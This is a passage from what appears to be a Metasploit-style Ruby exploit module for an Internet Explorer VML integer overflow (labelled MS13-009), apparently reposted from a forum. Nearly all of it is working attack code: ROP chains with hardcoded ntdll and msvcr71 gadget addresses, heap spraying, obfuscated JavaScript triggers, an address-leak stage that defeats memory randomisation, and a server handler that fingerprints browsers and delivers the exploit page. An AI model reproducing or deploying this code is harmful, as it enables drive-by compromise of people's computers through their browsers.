heap_obj.alloc(block); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_ntdll_rop case @ntdll_version when "6.1.7601.17514" stack_pivot = [ @ntdll_base+0x0001578a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop when "6.1.7601.17725" stack_pivot = [ @ntdll_base+0x0001579a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop else return "" end end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :jre print_status("Using JRE ROP") stack_pivot = [ 0x7c348b06, # ret # from msvcr71 0x7c341748, # pop ebx # ret # from msvcr71 0x7c348b05 # xchg eax, esp # ret from msvcr71 ].pack("V*") rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) when :ntdll print_status("Using ntdll ROP") rop_payload = get_ntdll_rop + payload.encoded end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x1000; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x1000; i++){ a[i] = document.getElementById("rect" + i.toString())._anchorRect; if (i == 0x800) { vml1.dashstyle = "1 2 3 4" } } vml1.dashstyle.array.length = 0 - 1; vml1.dashstyle.array.item(6) = 0x0c0c0c0c; for (var i=0; i<0x1000; i++) { delete a[i]; CollectGarbage(); } location.reload(); } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <script> #{js} </script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def html_info_leak js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x400; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x400; i++){ a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle; } for (var i=0; i<0x400; i++){ a[i].rotation; if (i == 0x300) { vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44" } } var length_orig = vml1.dashstyle.array.length; vml1.dashstyle.array.length = 0 - 1; for (var i=0; i<0x400; i++) { a[i].marginLeft = "a"; marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); if (marginLeftAddress > 0) { vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; var leak = a[i].marginLeft; vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; vml1.dashstyle.array.length = length_orig; document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) return; } } } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak html = html.gsub(/^\t\t/, '') print_status("Sending HTML to info leak...") send_response(cli, html, {'Content-Type'=>'text/html'}) else leak = begin request.uri_parts["QueryString"][@leak_param].to_i rescue 0 end if leak == 0 html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) return end vprint_status("ntdll leak: 0x#{leak.to_s(16)}") fingerprint = leak & 0x0000ffff case fingerprint when 0x70B0 @ntdll_version = "6.1.7601.17514" @ntdll_base = leak - 0x470B0 when 0x7090 @ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_base = leak - 0x47090 else print_error("ntdll version not detected, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end end Sursa: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow